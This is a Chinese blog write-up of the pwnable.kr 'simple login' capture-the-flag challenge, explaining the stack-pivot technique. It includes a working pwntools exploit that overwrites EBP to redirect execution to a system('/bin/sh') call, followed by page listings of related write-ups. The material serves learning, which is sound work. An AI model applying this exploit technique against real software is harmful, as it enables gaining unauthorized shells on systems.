pwn -- pwnable.kr -- simple-login---学习stack pivot

最新推荐文章于 2025-03-09 16:32:32 发布
最新推荐文章于 2025-03-09 16:32:32 发布
阅读量389 收藏 3
点赞数
分类专栏: pwn ctf ida 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YANG12345_6/article/details/122116951
版权

在看关于pwn的书时学到了 栈帧劫持stack pivot 利用这个例题练习一下。
基本思想:
stack pivot利用到的gadget是在函数退出时需要的两条指令:leave(mov esp,ebp;pop ebp);ret;。这两条指令基本都会有。
可以利用这两条指令,通过栈溢出的方式,实现可以完全控制栈。

stack pivot实现的基本方法

(我的理解

  1. 通过栈溢出的方式将 我们之后要实现的完全可控的栈的地址写到EBP的地方
  2. 写入之后 ,程序第一次leave;ret;,将写入的地址赋给esp。
    写入地址及第一次leave 图解:
    在这里插入图片描述

此时 ebp的值 变成了我们写入的地址,指向了新栈,esp还是在原来的栈上。
3. 之后执行ret,程序继续按原来的执行。继续执行,执行到下一个leave;ret的时候,esp也指向了新的栈上,此时就得到了一个完全可控的栈
图解:
在这里插入图片描述
进而就可以控制新栈的eip

分析例题:

  1. 执行文件
    在这里插入图片描述

  2. file一下,查看文件信息

    32位文件

  3. checksec 查看文件的保护情况
    在这里插入图片描述
    开了canaru和栈不可执行

  4. 拖进ida里分析
    main函数:
    在这里插入图片描述
    先是要输入一个字符串,然后将字符串进行base64解密结果保存在v4里 ,v6保存v4的长度,对长度进行限制,不可以大于0xC。
    之后将v4的值拷贝到input参数里,input为.bss段的值。
    之后通过auth函数判断输入的内容的base64的值和题目给出的base64一不一样,若一样,则调用下面的correct函数,然后调用system函数。
    不可能碰撞出跟题目给出的哈希值一样的东西的,所以只能通过漏洞触发这个system函数。

correct函数:
在这里插入图片描述
call system的地址:
在这里插入图片描述

0x08049284,执行system(“bin/sh”)

auth函数:
在这里插入图片描述
有一个栈溢出漏洞,此时将输入的内容拷贝到v4z中,v4的位置 :ebp-8h,input的长度在上面已经进行了限制,不大于0xC。所以在这里可以有4个字节的溢出
栈上的情况:
在这里插入图片描述
根据上面 stack pivot的方法,可以将我们想要控制的栈的地址写到 EBP的位置。

因为我们输入的东西都被保存在了input上,并且是通过input进行栈溢出的,所以我们可以把这个地址设置成为input的地址,执行到新栈上的时候,就可以继续执行写入的内容。

示意图:
在这里插入图片描述
所以可以将“bbbb”搞成调用system的地址。

  1. 分析的差不多了,exp:
from  pwn import *
from base64 import* 

p = process("./login")

sys_addr = 0x8049284
bss_addr = 0x811eb40
payload = "aaaa" + p32(sys_addr) +p32(bss_addr)

print(payload)
payload = b64encode(payload)
print(payload)
#  gdb.attach(p)

p.sendline(payload)
p.interactive()
pwnable.krsimple login
Jason_ZhouYetao的博客
07-14 667
这题与之前所作的题目不同,不同点在于这题不存在ssh连接至其他的服务器,需要自己在脚本中体现。 首先,下载文件,放到IDA里跑一跑(这里说明,要注意下载下来的文件是32位还是64位的文件,这关系到能不能正确打开并得到反汇编代码的问题),得到main函数的伪代码: int __cdecl main(int argc, const char **argv, const char **envp) ...
Pwnable.kr simple login
BengDouLove的博客
03-18 318
程序的逻辑是,首先输入s,最大三十个字节(这里没有溢出),然后base64解密,解密后的明文存在v4,长度存在v6, 后面判断v6不能大于12,判断成功后将v4复制到input变量,,之后进入auth函数 inout auth函数第一句的memcpy感觉就很突兀,把input复制给v4(这是autn里的v4),后面根本没有用到v4,从这个角度看这句话应该也有点问题,,, 因为前面判断了,所以inp...
pandas使用stackpivot实现数据透视
最新发布
听海边涛声
03-09 755
pandas使用stackpivot实现数据透视
pwnable.krsimplelogin
bluestar628的博客
12-09 375
这道题目还是很有意思的。是自从参加了一次pwn培训之后的第一道题目,感觉确实比以前舒服多了。 下载题目,IDA反汇编,基本逻辑很简单,输入一个字符串,进行base64解密,然后比对长度,如果超过12个就直接报错。 漏洞点找了很久,这个漏洞点确实很巧妙。开始的时候,checksec了一下。 发现开启了栈执行保护,和缓冲区溢出保护。所以直接放弃了栈溢出这个思路,
pwnable.kr - simple login
加号减减号的博客
03-08 707
题目信息 分析 解题思路 wirteup 题目信息 题目给出的信息如下: 分析 下载得到 login 文件,这是一个静态链接的可执行文件。拖进 IDA 分析,main 函数如下: int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE *v4; // [esp+18h] [...
stack pivot
weixin_34301132的博客
02-25 146
【转】http://www.2cto.com/article/201411/356646.html 当ROP链执行时,***者的最终目标是将shellcode重新放置在可执行的内存区域以绕过DEP保护。为了做到这一点,***者将调用一些类似VirtualAlloc的API函数。这些被***者用于绕过DEP的API是有限的。由于原始程序的堆栈被切换为指向***者控制的数据,因此...
apachecn#apachecn-ctf-wiki#PWN-dragon-echo1-echo2-[pwnable.kr]CT
07-25
1. malloc person 2. malloc dragon 3. free dragon
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
gdb-peda调试pwnable.kr题目random
publicStr的博客
03-30 1921
题目pwnable.kr——6.random各种技术文章开始前的例行叨叨:pwnable.kr是CTF—pwn类型题目学习网站,对其中第6题random解题过程做一份记录。本萌新菜鸡刚接触pwn,顺手做记录,欢迎指正讨论。源码:文件【random.c】#include <stdio.h> int main(){ unsigned int random; random = rand...
pwnable.kr [Rookiss] - [simple login]
Re:Umiade.tr
03-23 1401
Can you get authentication from this server? Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 Rookiss 初体验就从相对熟悉的逆向这一块开始好了。下载好文件后发现是 elf 64 ,在虚拟机上简单跑一跑,要求输入一个 Authenticat
PWN学习之[Rookiss]-[simple login]
Magic1an的博客
08-19 813
文件下载下来后是个elf可执行文件 用IDA反编译后可以看到溢出点在auth函数中_BOOL4 __cdecl auth(int a1) { char v2; // [sp+14h] [bp-14h]@1 char *s2; // [sp+1Ch] [bp-Ch]@1 int v4; // [sp+20h] [bp-8h]@1 memcpy(&v4, &input, a1); s
pwnable_simple_login
z1r0的博客
03-25 608
pwnable_simple_login 查看保护 上面图片可以看到有个溢出,一直溢出到了ebp。也就是说我们可以控制ebp,那如何控制ret_addr呢? 其实我们可以伪造一个假的内存块的地址,这个地址里里面放一个伪造的ebp和返回地址及参数,让程序认为伪造了一个正确的ret_addr。 from pwn import * import base64 context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0'
pwnable.krsimple login详解
Bill
04-26 2183
学习二进制不容易,大家要忍得住寂寞,耐得住孤独,进入正题. 总体思路: 输入更多的数据,溢出,修改main的返回值地址,使其返回到correct中,从而获取shell. 大家可能会有疑问:为什么不修改auth函数的返回值地址,跳到correct中.这是因为长度不够,我们需要输入16个字节的长度,才能覆盖返回值地址,但是程序只给了我们12个字节的长度. main函数int main(int
pwnable simple login
weixin_30542079的博客
11-08 132
这是一周前做的一道题目,总的来说这道题很简单,当然一开始看了半天没发现溢出点也是十分的惭愧,题目出的很良心,思路就是溢出之后我们可以控制main函数的ebp, 进而在main函数返回时进行漏洞利用。 先看看IDA反汇编的结果 主函数的几个内存操作的函数都没有什么问题,那么问题很可能出现在auth函数了 这时候溢出点就一目了然了,input最大12个字节,而v4只有8个字节,调试一下发...
pwnable.kr simple login
you_need_me的博客
06-02 293
点击打开链接
simple login(Pwnable.kr)
weixin_30252709的博客
06-10 128
0x1 准备工作 在分析这个题目时,我遇到了下面两个问题,先在这里说明一下: 1、 内存无法访问 gdb-peda$ si Cannot access memory at address 0x61616165 gdb-peda$ si 然而程序并没有因此而停止,只是一个提示而已,可以继续使用si命令进行单步跟踪。 2、汇编命令leave leave指令等同于下面两条命令(32位) mov esp,...
学习ctf和pwn的网址
03-15
当涉及到学习CTF(Capture The Flag)和Pwn(漏洞利用)的时候,以下是一些常用的网址和资源推荐: 1. CTFtime:https://ctftime.org/ - CTFtime是一个CTF竞赛的信息平台,你可以在这里找到各种CTF比赛的信息、题目和解答。 2. Pwnable.kr:http://pwnable.kr/ - Pwnable.kr是一个专注于Pwn题目的在线平台,****** CTF Wiki:https://ctf-wiki.github.io/ctf-wiki/ - CTF Wiki是一个开放的CTF知识库,包含了各种CTF相关的知识、技巧和工具的介绍和使用方法。 5. CTF365:https://ctf365.com/ - CTF365是一个在线的CTF训练平台,提供了各种类型的CTF题目供学习和挑战。 6. CTFlearn:https://ctflearn.com/ - CTFlearn是一个面向初学者的CTF学习平台,*********!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值